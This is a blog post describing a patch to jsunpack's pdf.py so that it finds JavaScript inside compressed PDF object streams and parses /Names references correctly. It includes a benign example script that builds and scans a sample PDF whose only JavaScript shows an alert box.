<span style="font-size: large;"><b>Jsunpack Patch for Detecting PDF JavaScript</b></span> (2012-03-27)</div>
<span style="font-size: large;"><b>1. Introduction</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Jsunpack
[1] is a great tool to examine the structure of a PDF and extract the embedded
JavaScript inside a document. Specifically, the python script “pdf.py”, which
is included in Jsunpack, handles the PDF document. The “pdf.py” script displays
the objects contained within a given PDF, detects embedded
JavaScript, and writes the JavaScript functions to a separate file for
analysis. However, “pdf.py” may not always detect the embedded JavaScript. An
example of a PDF document that bypasses detection is examined later. An experimental approach is followed to
figure out why jsunpack does not detect the embedded JavaScript, and a patch for
jsunpack is presented.</span><br />
<br />
<span style="font-size: large;"><b>2. JavaScript Detected</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">There
are two versions of a PDF document that displays “Hello World” and pops up an
alert box using JavaScript code. The first is the original version, which was
manually created in Notepad and stores its contents in plain text.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu90BH4nOnZO3rwZTuQvTX3fxVhOlOq2vYdrWespoKEtdfRPLjAPGIRpGGGOS47WuCkq22xmG42YuSW_NgmkjLvx-uzfEqipwhzzLUcNEq-d82_EkhDXwy4djyCgpZWMjMevG_U7ZNiz64/s1600/Figure1-1(1).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgu90BH4nOnZO3rwZTuQvTX3fxVhOlOq2vYdrWespoKEtdfRPLjAPGIRpGGGOS47WuCkq22xmG42YuSW_NgmkjLvx-uzfEqipwhzzLUcNEq-d82_EkhDXwy4djyCgpZWMjMevG_U7ZNiz64/s640/Figure1-1(1).PNG" width="393" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Fzegw1V1HlHMVuXq6oUHY6APmhubTahxsgaZgwjD5LLKs2qJOqpm3ARhdFPOKr3OVBtt8x-55J8hs6hrD7zfhQPnuItHfblHdsO-GoT-yUbOrgDOTGYUIlQ619B3r_qSkHlao3znLLaA/s1600/Figure1-1(2).PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8Fzegw1V1HlHMVuXq6oUHY6APmhubTahxsgaZgwjD5LLKs2qJOqpm3ARhdFPOKr3OVBtt8x-55J8hs6hrD7zfhQPnuItHfblHdsO-GoT-yUbOrgDOTGYUIlQ619B3r_qSkHlao3znLLaA/s640/Figure1-1(2).PNG" width="404" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.1 - <i>Version 1 of the uncompressed pdf document labeled "works_original.pdf"</i></td></tr>
</tbody></table>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Notepad++
is used to view the contents of the original PDF document shown in <i>Figure 1.1</i>. We can see there are two
objects with JavaScript tags: object 6 and object 8. Object 8 contains the
actual JavaScript code that produces the alert box, which displays “This is my
alert box”. We expect pdf.py to detect the JavaScript in objects 6 and 8, and it
does! <i>Figure 1.2</i> shows a partial output of pdf.py executed with the original
PDF as the input file.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2dZmHUmgdoXBMpuwT_2GQ2UnDF0wNAXYHoHq1UkdkH_w5ImhA85256Sjzz7SJ0bQtqj8N3_UcJFLJ9kGYziyrBt2QoA0UrmAl1NG0txxejfuVDRVA9qt4aFCF-Ofmd0k6fHN-3peM-VIv/s1600/Figure1-2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="279" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2dZmHUmgdoXBMpuwT_2GQ2UnDF0wNAXYHoHq1UkdkH_w5ImhA85256Sjzz7SJ0bQtqj8N3_UcJFLJ9kGYziyrBt2QoA0UrmAl1NG0txxejfuVDRVA9qt4aFCF-Ofmd0k6fHN-3peM-VIv/s640/Figure1-2.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.2 - <i>Output of pdf.py executed with version 1 of the pdf document (works_original.pdf)</i> </td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
original PDF document is labeled “works_original.pdf” since it is detected by
pdf.py as containing JavaScript.</span><br />
<br />
<span style="font-size: large;"><b>3. JavaScript Not Detected</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
second document is a compressed version of the “works_original.pdf” file. The
second version uses FlateDecode to compress the streams. When “works_original.pdf”
is saved in Adobe Acrobat Professional 9, the application automatically compresses and
converts the original version to the compressed version. pdf.py
can be used to examine the contents. We can see that the structure of the PDF
has been modified: new objects are created in the document that did not exist
in “works_original.pdf”. The compressed version is labeled “notwork.pdf”
since the JavaScript is not detected by pdf.py. <i>Figure 1.3</i> is the output from pdf.py
with the compressed version (notwork.pdf) as the input.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdlrOugQnIhaB2GNsfq7oDN9Da4WuABtWYFS5qiR6XC2CJ6cF4olFE-S8LekDC9HtNbsYjN3z8RR6mHLKPoh7iBrZ0bfpz6nbbZ_LV3WmMzeiIM55O9n2ZLggEDZHSvkIu1eebA0JVKAGt/s1600/Figure1-3%25281%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdlrOugQnIhaB2GNsfq7oDN9Da4WuABtWYFS5qiR6XC2CJ6cF4olFE-S8LekDC9HtNbsYjN3z8RR6mHLKPoh7iBrZ0bfpz6nbbZ_LV3WmMzeiIM55O9n2ZLggEDZHSvkIu1eebA0JVKAGt/s640/Figure1-3%25281%2529.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitN9LXsNjCxOYmg6wHukGRyRNbEX2UR9zQ3mlgufp6-5ShXBOZbuXeCFaPDslWqo2GQ0lJE87hhTZ0ogpY7vDm7Wid9pHC6eydLCrsKxTkwGIio4l9UnKl3BAB86lkJowmI3mNYR3qe8hU/s1600/Figure1-3%25282%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="414" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitN9LXsNjCxOYmg6wHukGRyRNbEX2UR9zQ3mlgufp6-5ShXBOZbuXeCFaPDslWqo2GQ0lJE87hhTZ0ogpY7vDm7Wid9pHC6eydLCrsKxTkwGIio4l9UnKl3BAB86lkJowmI3mNYR3qe8hU/s640/Figure1-3%25282%2529.PNG" width="640" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RKKd4TB5EnrV1CzQahFizEiVBQvHBOpVbF1lFN8HhVdHiKD5aBus8ycdW1TsmwtDzfFUQjAayydU44DvKMYJDm2LwGNoSl3sECC9C3eSYEoSCzEM49gqh_eVk7t_V0fyLL09ncU4tgbP/s1600/Figure1-3%25283%2529.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2RKKd4TB5EnrV1CzQahFizEiVBQvHBOpVbF1lFN8HhVdHiKD5aBus8ycdW1TsmwtDzfFUQjAayydU44DvKMYJDm2LwGNoSl3sECC9C3eSYEoSCzEM49gqh_eVk7t_V0fyLL09ncU4tgbP/s640/Figure1-3%25283%2529.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.3 - <i>Output of pdf.py executed with version 2 of the pdf document (notwork.pdf)</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">A
couple of interesting results can be seen in the figure above. First and most
importantly, no JavaScript is detected in the compressed file. Second, not all the
objects are displayed, yet references are included to objects that do not
appear in the output. For example, object 8 has a tag “/Names” which refers to
an object 13 that is not visible. To
get a better idea of what is going on and what is contained in the compressed
streams, the tool pdfstreamdumper [2] is used. This tool decompresses all the streams that have
been encoded with filters like “FlateDecode” and presents the text in a graphical
user interface.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNNUvg0N0VUAiDOQpx0l340chv2QNvV4dgygXpGnmRzg_2j5zbzTjaUtK6cWASWfIlr7LUKqMps65x3g8TupyNi6DCES8LzduFpCOzupuEB5oS6Th8pRK6r0kk8JRsKeddS_1UVsa1Z8Q/s1600/Figure+1-4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKNNUvg0N0VUAiDOQpx0l340chv2QNvV4dgygXpGnmRzg_2j5zbzTjaUtK6cWASWfIlr7LUKqMps65x3g8TupyNi6DCES8LzduFpCOzupuEB5oS6Th8pRK6r0kk8JRsKeddS_1UVsa1Z8Q/s200/Figure+1-4.PNG" width="125" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.4 - <i>Objects listed by Pdfstreamdumper for the notwork.pdf</i> </td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Pdfstreamdumper
provides a list of the objects contained in the PDF, displayed in <i>Figure 1.4</i>. The list is consistent with
the output that “pdf.py” returns, so where are the missing objects? If we
examine each object and its contents we discover that the missing objects are contained
within other objects. For example, object 10 contains objects 13, 14, 15 and 16.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR1_bvyg7xV9mf7ljfcWoVCzCwMZynHlcSWUSqdYqBe2_aGAhMn4gFCqpzPWc3CIWCLdZHdGor2CzAFy6PXWQ3tMd_114HlvBht_dLlLRTkzuonThmkAACEzLcGsWF2-R2NZqiFG9aB0yB/s1600/Figure+1-5.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjR1_bvyg7xV9mf7ljfcWoVCzCwMZynHlcSWUSqdYqBe2_aGAhMn4gFCqpzPWc3CIWCLdZHdGor2CzAFy6PXWQ3tMd_114HlvBht_dLlLRTkzuonThmkAACEzLcGsWF2-R2NZqiFG9aB0yB/s640/Figure+1-5.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.5 - <i>Contents of object 10 shown by Pdfstreamdumper for the notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To
understand the syntax we can refer to the PDF Document Reference [3]; however, it
is clear after some simple analysis. As we can see from <i>Figure 1.5</i>, four objects are listed consecutively. In each pair the first
number is the object number and the second is the byte offset at which that object's
content begins within the stream. So the first pair “13 0” declares that object 13 is
contained first, at offset 0. The next pair “14 22” declares object 14, whose
content is at offset 22. The same holds for the next two pairs, “15 49”
and “16 146”. If we look back at the output of pdf.py we see the tags for
object 10 and which tag allows for multiple objects.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietgw2CVq4BVs1XuC-L9GYIiEVnDpkdqgJ_GaNCQB_1WU4n7j4BlyofHDNXtm00J675JrghAoj7cQUOCrLCjTxdIoEHmKOq7hAgDwteWK2-ut9DwpUkgcHTcFtMYsGmJ01j4bRvhqL-DMd/s1600/Figure+1-6.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEietgw2CVq4BVs1XuC-L9GYIiEVnDpkdqgJ_GaNCQB_1WU4n7j4BlyofHDNXtm00J675JrghAoj7cQUOCrLCjTxdIoEHmKOq7hAgDwteWK2-ut9DwpUkgcHTcFtMYsGmJ01j4bRvhqL-DMd/s640/Figure+1-6.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.6 - <i>Snippet from the output of pdf.py for notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">We
see that the tag “/ObjStm” allows multiple objects to be embedded into
object 10, and we can confirm this by looking at the PDF Document Reference [3]. Also,
the tag “/N” tells us how many objects are included inside object 10; as we can
see in <i>Figure 1.6</i>, and as pdfstreamdumper verifies, the number of objects inside object 10 is 4. The
same process can be followed to determine where the missing objects 5 and
6 from the pdf.py output are located. Object 5 is embedded in object 2 and
object 6 is embedded in object 3. <i>Figure
1.7</i> and <i>Figure 1.8</i> show the
contents of objects 2 and 6 respectively, using pdfstreamdumper.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikBHXobsgg1A2agSJwPM5uYxlxsHc95mtf2UjSkDUPg-mTRDrQ2sWNBcYIz442sI2C5xRHnc0dsFelEYhbGYk9dVVJAnOLNJgjzw8DGWsbDloI53BLNWp28jRbuANBJyNqTX1_o8XhsnBt/s1600/Figure+1-7.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikBHXobsgg1A2agSJwPM5uYxlxsHc95mtf2UjSkDUPg-mTRDrQ2sWNBcYIz442sI2C5xRHnc0dsFelEYhbGYk9dVVJAnOLNJgjzw8DGWsbDloI53BLNWp28jRbuANBJyNqTX1_o8XhsnBt/s640/Figure+1-7.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.7 - <i>Contents of object 2 shown in Pdfstreamdumper for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY9VuyZDRkmx32aik4E63dAhfmEczkLeN-nUNRTEIAkwTJJf7CNSXkG7UcxznUXEC1CwwSkWKV4QPsLGg2VezWxcHXzxGTqt0_Uujld60srHrEpJW1RBo-t_kg_aj7WUGc0kYRHs3QJfC7/s1600/Figure+1-8.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhY9VuyZDRkmx32aik4E63dAhfmEczkLeN-nUNRTEIAkwTJJf7CNSXkG7UcxznUXEC1CwwSkWKV4QPsLGg2VezWxcHXzxGTqt0_Uujld60srHrEpJW1RBo-t_kg_aj7WUGc0kYRHs3QJfC7/s640/Figure+1-8.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.8 - <i>Contents of object 3 shown in Pdfstreamdumper for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
locations of the missing objects are known and this information can be used to
figure out why the pdf.py script does not detect the JavaScript in the “notwork.pdf”
document. The python debugger is utilized to step through the “pdf.py” functions
and determine how each object is parsed, specifically object 10. This article
assumes the reader knows how to use the python debugger and does not go into
detail on the debugging process.</span><br />
<br />
<span style="font-size: large;"><b>4. Results and Solution</b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The
results of the debugging session are the following. The python script “pdf.py”
does not handle the “/ObjStm” tag. Any object with a tag “/ObjStm” has a stream
that is decompressed, if necessary; however, the information in the stream is
not parsed by “pdf.py”. So what we can do here is inject code into pdf.py to
handle the “/ObjStm” tag. <i>Figure 1.9</i> is the code I wrote that detects if an object
has a “/ObjStm” tag. It also checks each object inside and determines if
JavaScript exists.</span><br />
<br />
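<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The object-stream layout described in Section 3 (the “13 0 14 22 …” header pairs, /N and /First) and the missing handling described here can be shown in a few lines of Python. The code below is an added example and is not jsunpack’s code nor the patch shown in Figure 1.9; it builds a constructed PDF in which the Catalog and a JavaScript action are packed into a FlateDecode object stream (object 10, as in the article), inflates every /ObjStm it finds, splits out the embedded objects using the header pairs, and reports the ones carrying a /JavaScript or /JS key. The object bodies and numbers are made up for the example; the dictionary matching assumes flat dictionaries, which is all an object stream itself carries.</span><br />

```python
"""Added example (not jsunpack's own code): locate /ObjStm object streams in a
PDF, inflate them, split out the embedded objects using the 'objnum offset'
header pairs, and flag any that carry a JavaScript key."""
import re
import zlib
from typing import Dict, Tuple

# Dictionary keys that mark JavaScript in a PDF object.
JS_KEYS = (b'/JavaScript', b'/JS')

# "num gen obj << dict >> stream\n". The non-greedy dictionary match is enough
# for the flat dictionary of an object stream; nested << >> (e.g. /DecodeParms)
# would need a real tokenizer.
OBJ_RE = re.compile(rb'(\d+)\s+\d+\s+obj\s*<<(.*?)>>\s*stream\r?\n', re.S)


def build_object_stream(objects: Dict[int, bytes]) -> Tuple[bytes, int, int]:
    """Constructed-sample builder: pack {objnum: body} into an uncompressed
    object-stream body as the PDF Reference lays it out, a header of
    'objnum offset' pairs followed by the objects, offsets relative to /First.
    Returns (body, /N, /First)."""
    header = b''
    data = b''
    for num, body in objects.items():
        header += b'%d %d ' % (num, len(data))
        data += body + b'\n'
    return header + data, len(objects), len(header)


def parse_object_stream(decoded: bytes, n: int, first: int) -> Dict[int, bytes]:
    """Split a decoded object-stream body into {objnum: body} using the /N
    header pairs; each object runs from its offset to the next object's offset."""
    header = decoded[:first].split()
    if len(header) < 2 * n:
        raise ValueError('object stream header has fewer than /N pairs')
    pairs = [(int(header[i]), int(header[i + 1])) for i in range(0, 2 * n, 2)]
    data = decoded[first:]
    objects = {}
    for idx, (num, off) in enumerate(pairs):
        end = pairs[idx + 1][1] if idx + 1 < len(pairs) else len(data)
        objects[num] = data[off:end].strip()
    return objects


def extract_objstm_javascript(pdf_bytes: bytes) -> Dict[int, bytes]:
    """Return {objnum: body} for every object embedded in an /ObjStm whose
    body contains a JavaScript key. Streams are inflated when /FlateDecode is set."""
    hits = {}
    for m in OBJ_RE.finditer(pdf_bytes):
        d = m.group(2)
        if b'/ObjStm' not in d:
            continue
        length = int(re.search(rb'/Length\s+(\d+)', d).group(1))
        n = int(re.search(rb'/N\s+(\d+)', d).group(1))
        first = int(re.search(rb'/First\s+(\d+)', d).group(1))
        raw = pdf_bytes[m.end():m.end() + length]
        decoded = zlib.decompress(raw) if b'/FlateDecode' in d else raw
        for num, body in parse_object_stream(decoded, n, first).items():
            if any(key in body for key in JS_KEYS):
                hits[num] = body
    return hits


# Constructed sample objects (numbers and bodies made up for this example):
# a Catalog whose OpenAction points at a JavaScript action object.
SAMPLE_OBJECTS = {
    13: b'<< /Type /Catalog /Pages 15 0 R /OpenAction 14 0 R >>',
    14: b"<< /S /JavaScript /JS (app.alert('This is my alert box');) >>",
    15: b'<< /Type /Pages /Kids [16 0 R] /Count 1 >>',
    16: b'<< /Type /Page /Parent 15 0 R >>',
}


def build_sample_pdf() -> bytes:
    """Wrap the constructed objects in a FlateDecode object stream (object 10)
    inside a minimal PDF skeleton, mimicking what Acrobat's save produced."""
    body, n, first = build_object_stream(SAMPLE_OBJECTS)
    compressed = zlib.compress(body)
    objstm = (b'10 0 obj\n<< /Type /ObjStm /N %d /First %d /Length %d /Filter /FlateDecode >>\nstream\n'
              % (n, first, len(compressed))) + compressed + b'\nendstream\nendobj\n'
    return b'%PDF-1.5\n' + objstm + b'%%EOF\n'


if __name__ == '__main__':
    for num, body in extract_objstm_javascript(build_sample_pdf()).items():
        print(num, body.decode('latin-1'))
```

<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">A plain string search over the raw file would miss object 14 entirely because it sits inside the deflated stream; only after inflating the stream and walking the header pairs does the JavaScript tag become visible, which is exactly the gap the patch closes. The header check against /N is the caveat worth keeping: a truncated or malformed object stream should raise rather than silently yield fewer objects than the file claims.</span><br />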
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XeqvJgMAUdyJOIXxFaElTibACLZ2d-spEBuz-3qsPWgPaLSgvy3txWq3vyPzyB2qTp9xI_kLJTjK2PwotS7_Ntxqau7AJGHzQ2AaZkefsqGH06BLzbE8YhaKGsamcYyIy_-MhNYPr_F1/s1600/Figure+1-9.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XeqvJgMAUdyJOIXxFaElTibACLZ2d-spEBuz-3qsPWgPaLSgvy3txWq3vyPzyB2qTp9xI_kLJTjK2PwotS7_Ntxqau7AJGHzQ2AaZkefsqGH06BLzbE8YhaKGsamcYyIy_-MhNYPr_F1/s640/Figure+1-9.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.9 - <i>Code created for pdf.py to address objects streams in a PDF document</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">This
code has also been submitted to Jsunpack’s source code and the patch request is pending review. <i>Figure 1.10</i> displays the new output for “notwork.pdf”
when executed with the modified “pdf.py” script, which includes the code shown
above.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6K36Ojx7YRqRN5W6iduM7wHNWnBEihxMoJOdYOo0JpvkyG4zQBoRyWNrIIVW8THtsnyrG3HRoGqxfNzZuR6xU7ocqG5ZslcthyphenhyphenPBBDf3f-7UtE8bWQd6pfIPeGwKWNM8q1eQXXqwEif_/s1600/Figure+1-11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="608" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhu6K36Ojx7YRqRN5W6iduM7wHNWnBEihxMoJOdYOo0JpvkyG4zQBoRyWNrIIVW8THtsnyrG3HRoGqxfNzZuR6xU7ocqG5ZslcthyphenhyphenPBBDf3f-7UtE8bWQd6pfIPeGwKWNM8q1eQXXqwEif_/s640/Figure+1-11.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmnbZKYMj2Y34anBjGum3XyP-9IKSQ8PQM5AZtHKsn0yNTrtZ-ZQckXloig8IY8u-B6vbPZ8bIOPPYfHhUqx5RfbNckqzTx_65KA7rXArQIzZJ8YJzjg3D8QIY56ADr0LdVmZc3xMQZsie/s1600/Figure+1-11_2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="608" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmnbZKYMj2Y34anBjGum3XyP-9IKSQ8PQM5AZtHKsn0yNTrtZ-ZQckXloig8IY8u-B6vbPZ8bIOPPYfHhUqx5RfbNckqzTx_65KA7rXArQIzZJ8YJzjg3D8QIY56ADr0LdVmZc3xMQZsie/s640/Figure+1-11_2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqkHqM0ictdvtaThG8RBebzn_ECDdFek6qt3pcvLT7hIy5RHPDkVXKfVBVKCEWgJNqYzeugN_yE6DchM3PK-o2zFn53KhCxXklWNnnqbusBaGW62jmb9f65L9KOAJeBW8Nu2f5SI7Rr5lj/s1600/Figure+1-11_3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="610" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqkHqM0ictdvtaThG8RBebzn_ECDdFek6qt3pcvLT7hIy5RHPDkVXKfVBVKCEWgJNqYzeugN_yE6DchM3PK-o2zFn53KhCxXklWNnnqbusBaGW62jmb9f65L9KOAJeBW8Nu2f5SI7Rr5lj/s640/Figure+1-11_3.PNG" width="640" /></a></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjokGShQg8UqRHFIogoI3Oq3q-jmrLb_3vY5dxvUNnpSRwvhJbetYwHZ1VhWaTvFJ7OzsqGynbeoQMio3qNtAIs-fDg1dRI9C1X4VRQalAvRBwetLhNA2yyORnaFMN8PyGTCa6W02lbQDWZ/s1600/Figure+1-11_4.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="472" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjokGShQg8UqRHFIogoI3Oq3q-jmrLb_3vY5dxvUNnpSRwvhJbetYwHZ1VhWaTvFJ7OzsqGynbeoQMio3qNtAIs-fDg1dRI9C1X4VRQalAvRBwetLhNA2yyORnaFMN8PyGTCa6W02lbQDWZ/s640/Figure+1-11_4.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.10 - <i>Output of modified pdf.py executed with the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As
we can see in<i> Figure 1.10</i> the python script now detects the JavaScript. Objects 13-16
and 5-6 were missing from the output of the unmodified version. Our modification makes those
objects visible in the output and also writes the JavaScript functions to a separate
file; in the example above the JavaScript is exported to a file named “notwork.pdf.out”.
Overall this solution improves the pdf.py script so that it handles objects packed
in an object stream and, more importantly, detects JavaScript hidden inside one.</span><br />
<br />
<span style="font-size: large;"><b>5. Additional Patch to Pdf.py </b></span><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Another
patch that has been made to the pdf.py script concerns the “/Names”
tag. I noticed that if a “/Names” array contains a custom name, written as a
string in parentheses, followed by an object reference, then the parser captures only
the text of the name and not the reference number. An example is shown below.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G6NJbwdr1pwgZ6Pb3IoooSG_S_o4QUkOR1Slb9Ee_wEIOHYtPRCHs8KzTsvWZZYq-rd69AnX80B0hBglTQROOwsuuMpU1HXRrIEya5exKnejyCzKYCYkYBksgNwbwRW1kAdBOPIIBxaa/s1600/Figure+1-12.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="34" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6G6NJbwdr1pwgZ6Pb3IoooSG_S_o4QUkOR1Slb9Ee_wEIOHYtPRCHs8KzTsvWZZYq-rd69AnX80B0hBglTQROOwsuuMpU1HXRrIEya5exKnejyCzKYCYkYBksgNwbwRW1kAdBOPIIBxaa/s640/Figure+1-12.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1.11 - <i>Snippet of the output from pdf.py for the file notwork.pdf</i></td></tr>
</tbody></table>
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Object
14 has a “/Names” tag and the output displays only the text “My Code”,
which is the name given to the reference to object 15. The reference
to object 15 itself does not appear. After tracing into the program with the python
debugger, the cause turns out to be the closing parenthesis of the string, which stops the parsing
function from capturing anything that follows it. This is easily fixed by
adding a condition to an existing “if” statement in “pdf.py”. The change is displayed in <i>Figure 1.12</i>.</span><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
